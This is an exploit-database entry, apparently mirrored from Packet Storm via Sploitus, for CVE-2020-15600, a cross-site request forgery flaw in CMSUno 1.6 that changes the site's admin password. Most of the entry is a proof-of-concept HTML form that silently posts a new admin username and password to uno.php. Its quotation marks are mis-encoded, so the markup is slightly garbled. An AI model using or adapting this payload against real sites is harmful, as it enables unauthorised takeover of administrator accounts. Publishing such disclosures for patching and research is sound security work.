Share
## https://sploitus.com/exploit?id=PACKETSTORM:158455
# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Date: 2020-05-31
# Exploit Author: Noth
# Vendor Homepage: https://github.com/boiteasite/cmsuno
# Software Link: https://github.com/boiteasite/cmsuno
# Version: v1.6
# CVE : 2020-15600
An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.
PoC :
<html>
<body>
<script>history.pushState(",",'/')</script>
<form action=âhttp://127.0.0.1/cmsuno-master/uno.phpâmethod=âPOSTâ>
<input type=âhiddenâ name=âuserâ value=âadminâ/>
<input type=âhiddenâ name=âpassâ value=âyourpasswordâ/>
<input type=âsubmitâ name=âuserâ value=âSubmit requestâ/>
</form>
</body>
</html>